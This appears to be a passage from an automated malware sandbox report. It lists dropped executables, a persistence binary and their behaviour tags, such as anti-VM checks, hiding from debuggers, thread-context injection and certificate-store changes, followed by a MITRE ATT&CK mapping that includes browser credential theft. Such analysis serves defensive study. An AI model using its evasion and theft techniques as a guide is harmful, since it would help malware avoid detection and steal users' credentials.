- - C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe
    "C:\Users\Admin\AppData\Local\Temp\1091745001\fefef60740.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2652
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1548
- - C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe
    "C:\Users\Admin\AppData\Local\Temp\1091747001\ff28c3aaec.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2572
- - C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe
    "C:\Users\Admin\AppData\Local\Temp\1091749001\2f4444c5a8.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    PID:2232
- - C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
    "C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2468
  - - C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
      "C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
      4⤵
      Executes dropped EXE
      PID:1316
  - - C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe
      "C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2000
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 508
      4⤵
      Loads dropped DLL
      Program crash
      PID:2576
- - C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe
    "C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:2992
- - C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe
    "C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"
    3⤵
    - Executes dropped EXE
    PID:2280
- - C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe
    "C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2276
- - C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe
    "C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:936
- - C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe
    "C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:600

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2124

C:\Windows\system32\taskeng.exe
taskeng.exe {BE56D322-AA82-4DF6-A41C-362E7701F7AC} S-1-5-21-3063565911-2056067323-3330884624-1000:KHBTHJFA\Admin:Interactive:[1]
1⤵
PID:2888
- C:\ProgramData\rwhkbvh\apitlt.exe
  C:\ProgramData\rwhkbvh\apitlt.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Modify Authentication Process

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion